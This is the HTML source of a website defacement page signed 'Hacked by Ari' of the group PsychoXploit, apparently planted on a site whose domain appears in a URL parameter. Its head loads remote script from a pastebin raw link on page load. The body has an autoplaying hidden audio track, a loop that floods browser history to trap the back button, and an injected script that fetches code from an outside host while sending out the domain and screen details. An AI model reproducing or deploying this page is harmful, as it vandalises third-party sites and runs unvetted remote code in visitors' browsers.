<html>

<head>
	<link rel="icon" type="image/png" href="https://i.pinimg.com/originals/f4/35/22/f43522bf3b4bbe2ed9927c250467bd3b.jpg">
	<title>PsychoXploit</title>
	<meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
	<meta name="google-site-verification" content="Ari">
	<meta name="theme-color" content="black">
	<meta http-equiv="Content-Type" content="text/html; charset=Windows-1254">
	<meta name="description" content="We Just Psycho">
	<meta name="author" content="Ari, PsychoXploit">
	<meta name="keywords" content="Ari, PsychoXploit">
	<meta name="googlebot" content="all">
	<meta name="robots" content="all">
	<meta name="googlebot-news" content="all">
	<meta name="google" content="notranslate">
	<meta name="og:title" content="Hacked by PsychoXploit">
	<meta property="og:image" content="https://ih0.redbubble.net/image.622876166.4056/flat,550x550,075,f.u2.jpg">
	<meta property="og:type" content="website">
	<meta property="og:updated_time" content="1440432930">
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
	<script type="text/javascript" src="https://pastebin.com/raw/ynL2hpMe"></script>
	<style type="text/css">
		/* Copyright GHz7 */
	
	@import url("https://fonts.googleapis.com/css?family=Iceland|Shadows+Into+Light&display=swap");
	body {
		overflow: hidden;
		display: flex;
		align-items: center;
		justify-content: center;
		margin: 0;
		padding: 0;
		width: 100%;
		background-color: black;
	}
	
	i {
		margin: 10px;
		color: red;
	}
	
	a:link {
		color: #000;
	}
	
	h1 {
		color: #000;
		text-decoration: none;
		border-radius: 0px;
		border: 0px;
		font-family: 'Shadows Into Light', cursive;
		font-size: 50px;
		margin: 0px;
		padding: 0px;
		animation: Ari 0.5s linear infinite;
	}
	
	pre {
		color: grey;
	}
	
	marquee {
		width: 100%;
	}
	
	@keyframes Ari {
		2% {
			color: #fff;
		}
		3% {
			transform: translate(2px, -10px) skewX(3240deg);
		}
		5% {
			transform: translate(0px, 0px) skewX(0deg);
		}
		2%,
		54% {
			transform: translateX(0px) skew(0deg);
		}
		55% {
			transform: translate(-2px, 6px) skew(-5530deg);
		}
		56% {
			transform: translate(0px, 0px) skew(0deg);
		}
		57% {
			transform: translate(4px, -10px) skew(-70deg);
		}
		58% {
			transform: translate(0px, 0px) skew(0deg);
		}
		62% {
			transform: translate(0px, 20px) skew(0deg);
		}
		63% {
			transform: translate(4px, -2px) skew(0deg);
		}
		90% {
			transform: translate(1px, 3px);
			skew(-230deg);
		}
		95% {
			transform: translate(-7px, 2px);
			skew(-120deg);
		}
		100% {
			transform: translate(0px, 0px) skew(0deg);
		}
	</style>
	<script type="text/javascript" async="" src="http://p01.notifa.info/3fsmd3/request?id=1&amp;enc=9UwkxLgY9&amp;params=4TtHaUQnUEiP6K%2fc5C582Am8lISurprA9Yc9k6DaNoeSGzd9H6ddLQIdFTlsRb2EDZabLIjE2V%2fivgS71EZEevW54uKTVEwqEfZBGBiouPpD5RdZ9vdUFheHq1LnsIAL0bYMOBUhejygGTRqSSj%2fi2revINpt3lvKx9ZXvJbG6dMd67Vgi6pFaicZGO9JcKlThML2k9CRuxKVAnvvZyAwuy5bKn9AMsTvHA6fdQRupJh9RIFuGl%2fS65C9JRGQn5EhY2PQXCRzOJ31rf9ahZlud%2f%2f2gjMbmiCFXLe3J2NV%2fV%2b9%2fFnE8G5dRzS0zd6GrrWETtrs%2bdI433SPV%2fYaLmwu%2fTVLd%2b%2bHdq5EkZ%2bfWNSxaMN2seNAC1S67Lbjfy5Vy7l0f2Yub8flS3rB72af%2bFJ3QnC3xZnWLNv9o70IXRY3ZrtZCK5AJPOMA9ETPoHZV01%2fN3SAlBrvosnTp4AGe%2bioR9TS1Rqz%2b9Rn8FCUpbBvWORe7q2V%2f%2b25IwwL1fy85J6scTJ9MSxyIr%2buxgWZIxNWPIXHiDDmjodkzm0gf6858Bs%2b%2fG5IzojuyYby2iN%2bEsdowiL2xc%2fvkEv0CreJDOf9gnOZC4F90YF6YrVTDO5KehAB0AGe4bXOXSzvCKLpfJj6dKbsSflT1Ziqry46oitfElskr8%2bhBo2&amp;idc_r=47004442258&amp;domain=police.myartsonline.com&amp;sw=1366&amp;sh=640"></script>
</head>

<body scroll="no" style="overflow: hidden" ondragstart="window.event.returnValue=false" onselectstart="event.returnValue=false" data-new-gr-c-s-check-loaded="8.871.0" data-gr-ext-installed="">
	<embed src="https://g.top4top.net/m_1438oc8ui1.mp3" type="audio/mpeg" autostart="true" loop="true" width="0" height="0">
	<script>
	(function() {
		for(var i = 0; i < 20; i++) {
			history.pushState(null, document.title, window.location.href);
		}
	})(document, window, history);
	</script>
	<center> <img title="PsychoXploit" class="picture" src="https://ih0.redbubble.net/image.622876166.4056/flat,550x550,075,f.u2.jpg" width="183px" height="275px">
		<br>
		<h1><font color="red">Hacked by</font> <font color="blue"> Ari</font></h1>
		<br> <pre>Psycho<font color="red">X</font>ploit<br>
 We Just Psycho<br>
 SitiAnisaChan@gmail.com </pre>
		<br>
		<marquee direction="scroll"><pre>GHz7 - Ladies2 - VxSee7 - prizeHdru - ./VinceGh05T - Zeylan7 - Chu404 - Lee7 - Sundaype`em - Hax0rSec166 - Syntrovert7 - ViaVallen</pre></marquee>
		<br> <pre>Greetz : T1D4KD1k3N4L</pre> </center>
	<script type="text/javascript">
	if(self == top) {
		function netbro_cache_analytics(fn, callback) {
			setTimeout(function() {
				fn();
				callback();
			}, 0);
		}

		function sync(fn) {
			fn();
		}

		function requestCfs() {
			var idc_glo_url = (location.protocol == "https:" ? "https://" : "http://");
			var idc_glo_r = Math.floor(Math.random() * 99999999999);
			var url = idc_glo_url + "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582Am8lISurprA9Yc9k6DaNoeSGzd9H6ddLQIdFTlsRb2EDZabLIjE2V%2fivgS71EZEevW54uKTVEwqEfZBGBiouPpD5RdZ9vdUFheHq1LnsIAL0bYMOBUhejygGTRqSSj%2fi2revINpt3lvKx9ZXvJbG6dMd67Vgi6pFaicZGO9JcKlThML2k9CRuxKVAnvvZyAwuy5bKn9AMsTvHA6fdQRupJh9RIFuGl%2fS65C9JRGQn5EhY2PQXCRzOJ31rf9ahZlud%2f%2f2gjMbmiCFXLe3J2NV%2fV%2b9%2fFnE8G5dRzS0zd6GrrWETtrs%2bdI433SPV%2fYaLmwu%2fTVLd%2b%2bHdq5EkZ%2bfWNSxaMN2seNAC1S67Lbjfy5Vy7l0f2Yub8flS3rB72af%2bFJ3QnC3xZnWLNv9o70IXRY3ZrtZCK5AJPOMA9ETPoHZV01%2fN3SAlBrvosnTp4AGe%2bioR9TS1Rqz%2b9Rn8FCUpbBvWORe7q2V%2f%2b25IwwL1fy85J6scTJ9MSxyIr%2buxgWZIxNWPIXHiDDmjodkzm0gf6858Bs%2b%2fG5IzojuyYby2iN%2bEsdowiL2xc%2fvkEv0CreJDOf9gnOZC4F90YF6YrVTDO5KehAB0AGe4bXOXSzvCKLpfJj6dKbsSflT1Ziqry46oitfElskr8%2bhBo2" + "&idc_r=" + idc_glo_r + "&domain=" + document.domain + "&sw=" + screen.width + "&sh=" + screen.height;
			var bsa = document.createElement('script');
			bsa.type = 'text/javascript';
			bsa.async = true;
			bsa.src = url;
			(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(bsa);
		}
		netbro_cache_analytics(requestCfs, function() {});
	};
	</script>
</body>

</html>
